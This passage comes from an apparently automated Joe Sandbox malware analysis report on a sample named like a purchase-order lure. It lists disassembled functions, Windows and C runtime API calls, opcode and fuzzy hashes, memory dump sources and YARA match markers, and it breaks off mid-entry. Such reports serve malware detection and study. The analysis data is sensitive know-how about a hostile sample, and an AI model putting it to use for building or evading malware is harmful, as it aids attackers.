                                                                                                                                                                                                                                      • Instruction ID: 72dd180cd7110ee49b406fd12918c6a771032a3efea8c67e715e4993f3fed615
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 54E09A312003009FC320AB61DC08FA337AAEF88311F04C829E55A936A0DB78EC42CB58
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(Function_000123AF), ref: 004123F6
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.1743894026.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.1743894026.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.1743894026.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.1743894026.000000000056D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_PO_2024_056209_MQ04865_ENQ_1045.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3192549508-0
                                                                                                                                                                                                                                      • Opcode ID: 4924e8eeaf860e2c76ee0bfea96ab0c911441afc8f12962253436aa9ca0899ee
                                                                                                                                                                                                                                      • Instruction ID: 17be93bd3878235df00445469c4c747c8dbd7a907b9f456768254b9c32cbcc1b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4924e8eeaf860e2c76ee0bfea96ab0c911441afc8f12962253436aa9ca0899ee
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CA900270661144D7865017705D0968669949B4C6427618471653DD4098DBAA40505569
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.1743894026.000000000045A000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.1743894026.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.1743894026.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.1743894026.000000000056D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_PO_2024_056209_MQ04865_ENQ_1045.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: ab2fee5558319bb7b77599fdacabd9ee24db5531fb8add38223017fc8891590f
                                                                                                                                                                                                                                      • Instruction ID: a660be20e8b83a6a37b5dc48827ddad1653b91f65383dc4001cb042e5c412145
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ab2fee5558319bb7b77599fdacabd9ee24db5531fb8add38223017fc8891590f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7831F2A2A053845BFF328A689814AB77B689B733B4F1C41E7E48487393D13D9C44C3AD
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.1751784335.0000000002BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BD0000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_2bd0000_PO_2024_056209_MQ04865_ENQ_1045.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                                                                                                                                                                                      • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • LCMapStringW.KERNEL32(00000000,00000100,00420398,00000001,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004170B3
                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000,?,7FFFFFFF,00000000,00000000,?,034218D8), ref: 004170C5
                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 00417151
                                                                                                                                                                                                                                      • _malloc.LIBCMT ref: 0041718A
                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171BD
                                                                                                                                                                                                                                      • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171D9
                                                                                                                                                                                                                                      • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,?,?), ref: 00417213
                                                                                                                                                                                                                                      • _malloc.LIBCMT ref: 0041724C
                                                                                                                                                                                                                                      • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,00000000,?), ref: 00417277
                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 0041729A
                                                                                                                                                                                                                                      • __freea.LIBCMT ref: 004172A4
                                                                                                                                                                                                                                      • __freea.LIBCMT ref: 004172AD
                                                                                                                                                                                                                                      • ___ansicp.LIBCMT ref: 004172DE
                                                                                                                                                                                                                                      • ___convertcp.LIBCMT ref: 00417309
                                                                                                                                                                                                                                      • LCMapStringA.KERNEL32(?,?,00000000,?,00000000,00000000,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?), ref: 0041732A
                                                                                                                                                                                                                                      • _malloc.LIBCMT ref: 00417362
                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00417384
                                                                                                                                                                                                                                      • LCMapStringA.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?), ref: 0041739C
                                                                                                                                                                                                                                      • ___convertcp.LIBCMT ref: 004173BA
                                                                                                                                                                                                                                      • __freea.LIBCMT ref: 004173CF
                                                                                                                                                                                                                                      • LCMapStringA.KERNEL32(?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004173E9
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.1743894026.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.1743894026.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.1743894026.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.1743894026.000000000056D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_PO_2024_056209_MQ04865_ENQ_1045.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: String$ByteCharMultiWide__freea_malloc$___convertcp$ErrorLast___ansicp_memset
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3809854901-0
                                                                                                                                                                                                                                      • Opcode ID: b16ff40dd4ba9ebc371e1f7effab867f6711c58894302612c2f4823bb6b89e2c
                                                                                                                                                                                                                                      • Instruction ID: cdfffc9a1d2b3026f9ae82d5cc8d175594050d3ba9b5f3d3ede674b9b5b9b85c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b16ff40dd4ba9ebc371e1f7effab867f6711c58894302612c2f4823bb6b89e2c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 29B1B072908119EFCF119FA0CC808EF7BB5EF48354B14856BF915A2260D7398DD2DB98
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • ___free_lconv_mon.LIBCMT ref: 02C12543
                                                                                                                                                                                                                                        • Part of subcall function 02C13073: _free.LIBCMT ref: 02C13090
                                                                                                                                                                                                                                        • Part of subcall function 02C13073: _free.LIBCMT ref: 02C130A2
                                                                                                                                                                                                                                        • Part of subcall function 02C13073: _free.LIBCMT ref: 02C130B4
                                                                                                                                                                                                                                        • Part of subcall function 02C13073: _free.LIBCMT ref: 02C130C6
                                                                                                                                                                                                                                        • Part of subcall function 02C13073: _free.LIBCMT ref: 02C130D8
                                                                                                                                                                                                                                        • Part of subcall function 02C13073: _free.LIBCMT ref: 02C130EA
                                                                                                                                                                                                                                        • Part of subcall function 02C13073: _free.LIBCMT ref: 02C130FC
                                                                                                                                                                                                                                        • Part of subcall function 02C13073: _free.LIBCMT ref: 02C1310E
                                                                                                                                                                                                                                        • Part of subcall function 02C13073: _free.LIBCMT ref: 02C13120
                                                                                                                                                                                                                                        • Part of subcall function 02C13073: _free.LIBCMT ref: 02C13132
                                                                                                                                                                                                                                        • Part of subcall function 02C13073: _free.LIBCMT ref: 02C13144
                                                                                                                                                                                                                                        • Part of subcall function 02C13073: _free.LIBCMT ref: 02C13156
                                                                                                                                                                                                                                        • Part of subcall function 02C13073: _free.LIBCMT ref: 02C13168
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 02C12538
                                                                                                                                                                                                                                        • Part of subcall function 02C12096: HeapFree.KERNEL32(00000000,00000000,?,02C13208,?,00000000,?,00000000,?,02C1322F,?,00000007,?,?,02C12697,?), ref: 02C120AC
                                                                                                                                                                                                                                        • Part of subcall function 02C12096: GetLastError.KERNEL32(?,?,02C13208,?,00000000,?,00000000,?,02C1322F,?,00000007,?,?,02C12697,?,?), ref: 02C120BE
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 02C1255A
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 02C1256F
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 02C1257A
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 02C1259C
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 02C125AF
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 02C125BD
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 02C125C8
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 02C12600
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 02C12607
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 02C12624
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 02C1263C
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.1751784335.0000000002BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BD0000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_2bd0000_PO_2024_056209_MQ04865_ENQ_1045.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 161543041-0
                                                                                                                                                                                                                                      • Opcode ID: 8be41d02eccd186362186d0af5c591187682da4b0d504738e26a30dfd74ee8c6
                                                                                                                                                                                                                                      • Instruction ID: dabf679bad911252937e21004670abb9d4afc483fc2f4c05d73754e64cb4ef25
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8be41d02eccd186362186d0af5c591187682da4b0d504738e26a30dfd74ee8c6
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8F318B75A003219FEB31AA38DC56B56B3EAFB42311F104519EC4AD7190EF70EA80FB52
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • RtlDecodePointer.NTDLL(00000000), ref: 02C11A3E
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.1751784335.0000000002BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BD0000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_2bd0000_PO_2024_056209_MQ04865_ENQ_1045.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: DecodePointer
                                                                                                                                                                                                                                      • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                                                                                                                                                                                      • API String ID: 3527080286-3064271455
                                                                                                                                                                                                                                      • Opcode ID: a1b561dd9d6f6d9efe4b487bc64dd19ceff411d47f2d253dfa5adb5cc5406607
                                                                                                                                                                                                                                      • Instruction ID: 5911de79bb7c95c6d1b4f780b8bbacd5076e00d1f1198481406dc1dc188e1bf1
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a1b561dd9d6f6d9efe4b487bc64dd19ceff411d47f2d253dfa5adb5cc5406607
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1E51B5B1A0451ACBCF00DF58DA4A1ED7FB4FF4B314F1801C5D649A7254DBB98A28EB64
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • _malloc.LIBCMT ref: 004057DE
                                                                                                                                                                                                                                        • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                                                                                                                                                                                                                                        • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                                                                                                                                                                                                                                        • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
                                                                                                                                                                                                                                      • _malloc.LIBCMT ref: 00405842
                                                                                                                                                                                                                                      • _malloc.LIBCMT ref: 00405906
                                                                                                                                                                                                                                      • _malloc.LIBCMT ref: 00405930
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.1743894026.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.1743894026.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.1743894026.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.1743894026.000000000056D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_PO_2024_056209_MQ04865_ENQ_1045.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _malloc$AllocateHeap
                                                                                                                                                                                                                                      • String ID: 1.2.3
                                                                                                                                                                                                                                      • API String ID: 680241177-2310465506
                                                                                                                                                                                                                                      • Opcode ID: 64d57b24c90c17737e8f9baa349f19b9f9970d6aaf881d525023fd74c78c4ea3
                                                                                                                                                                                                                                      • Instruction ID: 6f54ea0e5a0cddcbb7a6eab5c61130b8c10e9e343dc86a4c4a61a5a67c51a18e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 64d57b24c90c17737e8f9baa349f19b9f9970d6aaf881d525023fd74c78c4ea3
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8B61F7B1944B408FD720AF2A888066BBBE0FB45314F548D3FE5D5A3781D739D8498F5A
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.1743894026.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.1743894026.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.1743894026.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.1743894026.000000000056D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_PO_2024_056209_MQ04865_ENQ_1045.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3886058894-0
                                                                                                                                                                                                                                      • Opcode ID: bd76f0579c09bb0a6f952e3feb4c94488d7cfab1bd6474dd60967b9cc6db7677
                                                                                                                                                                                                                                      • Instruction ID: 0234425abcb0213f77efd30778ac7634d7a408156a07f93f58cd91f86a00e979
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bd76f0579c09bb0a6f952e3feb4c94488d7cfab1bd6474dd60967b9cc6db7677
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1E519031A00605ABCB209F69C844A9FBB75EF41324F24863BF825B22D1D7799E51CBDD
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,02C18311,?,00000000,?,00000000,00000000), ref: 02C17BDE
                                                                                                                                                                                                                                      • __fassign.LIBCMT ref: 02C17C59
                                                                                                                                                                                                                                      • __fassign.LIBCMT ref: 02C17C74
                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 02C17C9A
                                                                                                                                                                                                                                      • WriteFile.KERNEL32(?,?,00000000,02C18311,00000000,?,?,?,?,?,?,?,?,?,02C18311,?), ref: 02C17CB9
                                                                                                                                                                                                                                      • WriteFile.KERNEL32(?,?,00000001,02C18311,00000000,?,?,?,?,?,?,?,?,?,02C18311,?), ref: 02C17CF2
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.1751784335.0000000002BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BD0000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_2bd0000_PO_2024_056209_MQ04865_ENQ_1045.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1324828854-0
                                                                                                                                                                                                                                      • Opcode ID: bc7d060f517137c291048de42b27ea19b138fb679aa4ce25dd11de0af70673ec
                                                                                                                                                                                                                                      • Instruction ID: a5cf194d87602baf6cd93e6b5a2e06e33740deb8c33014c2952bc10a8d4b0498
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bc7d060f517137c291048de42b27ea19b138fb679aa4ce25dd11de0af70673ec
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 855193B1E002499FDB10CFA8D886BEEFBF5EF4A300F14455AE555E7281D7309955CBA0
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 02C131DA: _free.LIBCMT ref: 02C13203
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 02C13264
                                                                                                                                                                                                                                        • Part of subcall function 02C12096: HeapFree.KERNEL32(00000000,00000000,?,02C13208,?,00000000,?,00000000,?,02C1322F,?,00000007,?,?,02C12697,?), ref: 02C120AC
                                                                                                                                                                                                                                        • Part of subcall function 02C12096: GetLastError.KERNEL32(?,?,02C13208,?,00000000,?,00000000,?,02C1322F,?,00000007,?,?,02C12697,?,?), ref: 02C120BE
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 02C1326F
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 02C1327A
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 02C132CE
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 02C132D9
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 02C132E4
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 02C132EF
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.1751784335.0000000002BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BD0000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_2bd0000_PO_2024_056209_MQ04865_ENQ_1045.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 776569668-0
                                                                                                                                                                                                                                      • Opcode ID: fcd263e1e97f9626aa0bdc167c26919d6134e182e28646451650430cd4015995
                                                                                                                                                                                                                                      • Instruction ID: 670746cda83927647c8f5948c3a957a1196718aececa172a2e9b067c62c7b24e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fcd263e1e97f9626aa0bdc167c26919d6134e182e28646451650430cd4015995
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 14113D72A40B54AAEE31FBB0CC0BFCB779E6F07704F400955AA9EA7050DA65A504FA91
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,?,00000000,?,?,?,02C1473A,?,?,00000000), ref: 02C14543
                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,02C1473A,?,?,00000000,?,?,?), ref: 02C145C9
                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 02C146C3
                                                                                                                                                                                                                                      • __freea.LIBCMT ref: 02C146D0
                                                                                                                                                                                                                                        • Part of subcall function 02C132FA: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 02C1332C
                                                                                                                                                                                                                                      • __freea.LIBCMT ref: 02C146D9
                                                                                                                                                                                                                                      • __freea.LIBCMT ref: 02C146FE
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.1751784335.0000000002BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BD0000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_2bd0000_PO_2024_056209_MQ04865_ENQ_1045.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1414292761-0
                                                                                                                                                                                                                                      • Opcode ID: 4abababdd28cee719b0f49926bd774169b4a5b092f9a805eaf57d6dabd2a75b8
                                                                                                                                                                                                                                      • Instruction ID: d752e1e69330a32d0085726cf16db1711f6438995a41c782e3216d2053e24780
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4abababdd28cee719b0f49926bd774169b4a5b092f9a805eaf57d6dabd2a75b8
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F351D272600216AFDB398F64CC43EAF77AAEB86758B154628FC08D7140EB74DD50EA50
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.1751784335.0000000002BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BD0000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_2bd0000_PO_2024_056209_MQ04865_ENQ_1045.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3160817290-0
                                                                                                                                                                                                                                      • Opcode ID: 640c76066766b0eabeadf936d024bede1c4690a011618f96b89b3b3fb39c84fe
                                                                                                                                                                                                                                      • Instruction ID: 4ae6a1ac5c44c9ab74f04969453253e37a4c2c1c1b2a02b5af1a6069fed37dd3
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 640c76066766b0eabeadf936d024bede1c4690a011618f96b89b3b3fb39c84fe
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 78F0F9365406106BE62226356C07F2E12675FC3771B2A8734FE1D92240EFA98912F551
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,02C13F73,00000003,?,02C13F13,00000003,02C2DE80,0000000C,02C1403D,00000003,00000002), ref: 02C13FE2
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 02C13FF5
                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,02C13F73,00000003,?,02C13F13,00000003,02C2DE80,0000000C,02C1403D,00000003,00000002,00000000), ref: 02C14018
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.1751784335.0000000002BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BD0000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_2bd0000_PO_2024_056209_MQ04865_ENQ_1045.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                      • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                      • Opcode ID: 1b134a726228be671428c01bdfde7e8b97e018de82e43cd516e95255dfefc78f
                                                                                                                                                                                                                                      • Instruction ID: d65e50c69ec450ef88de1c49173dea18d1da814372f9dc8557f4183c7ae1b4cf
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1b134a726228be671428c01bdfde7e8b97e018de82e43cd516e95255dfefc78f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8DF0A431E41218FBDB259F91DC0BB9DBBB9FF45766F100164E806A2140CF708A54DA90
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • __getptd.LIBCMT ref: 00414744
                                                                                                                                                                                                                                        • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
                                                                                                                                                                                                                                        • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
                                                                                                                                                                                                                                      • __getptd.LIBCMT ref: 0041475B
                                                                                                                                                                                                                                      • __amsg_exit.LIBCMT ref: 00414769
                                                                                                                                                                                                                                      • __lock.LIBCMT ref: 00414779
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.1743894026.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.1743894026.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.1743894026.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.1743894026.000000000056D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_PO_2024_056209_MQ04865_ENQ_1045.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                                                                                                                                                                      • String ID: @.B
                                                                                                                                                                                                                                      • API String ID: 3521780317-470711618
                                                                                                                                                                                                                                      • Opcode ID: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                                                                                                                                                                                                                                      • Instruction ID: 91aff3cf2d6bbea4e2ea5d49e8e08bf0f41c3eb50374f8394f27d7b6c467aa53
